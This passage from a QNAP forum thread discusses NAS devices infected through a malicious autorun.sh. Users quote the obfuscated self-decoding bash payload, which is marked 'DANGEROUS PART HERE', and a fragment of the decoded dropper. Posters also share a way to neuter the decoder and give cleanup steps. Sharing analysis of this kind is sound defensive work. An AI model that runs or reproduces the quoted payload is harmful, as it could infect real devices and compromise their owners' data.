$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/
... remainder omitted for brevity ...
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
... remainder omitted for brevity ...
somy1982 wrote: I don't get the point why to disconnect from LAN?
As an extra precaution, without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
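As an added example (not code from the thread or any poster), here is the "neutering" step Mousetick describes, applied to a harmless two-pass sample constructed inline: each stage has the shape `<decoder> << "TAG" | sh`, and cutting the pipe off the decoder line makes it print the next stage instead of running it. It assumes the decoder is the first line carrying a quoted heredoc tag followed by a pipe, which is the shape of the posted autorun.sh (where the `tr` command itself hides behind variables).

```shell
#!/bin/sh
# Added example, not code from the thread: "neuter" a self-decrypting stage
# of the form   <decoder> << "TAG" | sh   so it prints the next stage
# instead of running it, and repeat while the output is itself such a stage.
# Assumption: the decoder line is the first line carrying a quoted heredoc
# tag followed by a pipe (the shape seen in the posted autorun.sh).

# Write a constructed, harmless two-pass sample to $1. Each pass is ROT13
# via tr over a quoted heredoc, piped to sh, the same construction as the
# malware (with the real thing, the tr command hides in variables).
make_sample() {
    cat > "$1" << 'SAMPLE'
tr 'a-zA-Z' 'n-za-mN-ZA-M' << "QqQ" | sh
ge 'n-mN-M' 'a-mn-zA-MN-Z' << "KlM" | fu
echo decoded-stage-ok
KlM
QqQ
SAMPLE
}

# Copy $1 to $1.neutered with the trailing "| sh..." removed from the first
# decoder line, then run that copy: it emits the decoded next stage on stdout
# instead of executing it.
neuter_stage() {
    awk '!seen && /<<[ \t]*"[A-Za-z0-9_]*"[ \t]*\|/ {
             sub(/[ \t]*\|[^|]*$/, ""); seen = 1
         }
         { print }' "$1" > "$1.neutered"
    sh "$1.neutered"
}

# Decode $1 pass by pass, keeping each intermediate as $1.stageN, and print
# the final plaintext. Stops when the output no longer looks like a decoder
# stage (no quoted heredoc tag followed by a pipe), or after 8 passes.
decode_all() {
    cur="$1"
    n=0
    while [ "$n" -lt 8 ] &&
          grep -q '<<[[:space:]]*"[A-Za-z0-9_]*"[[:space:]]*|' "$cur"; do
        n=$((n + 1))
        next="$1.stage$n"
        neuter_stage "$cur" > "$next"
        cur="$next"
    done
    cat "$cur"
}
# Usage: make_sample /tmp/s.sh && decode_all /tmp/s.sh   -> echo decoded-stage-ok
```

Work on a copy of the script, offline; the decoder part (variable assignments and the `tr` call) still runs, only the final `| sh` does not.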
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
benzo83 wrote: Unfortunately I do. QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
Check all apps under the .qpkg folder - reinstall them all if you can. I found many sh scripts infected, also the ones malware remover claimed recovered!! When exactly on 25/8 was the file created? Mine was around 9am Europe time.
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Mousetick wrote: Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards. This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Thanks, have done that and removed the autorun.sh. Deleted everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs seem to be removed permanently.
Today I went into the .qpkg folder and found many files had been hacked, so now I have reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch.
Does anybody know if QNAP provides a way to completely reset the QTS OS and leave data unchanged?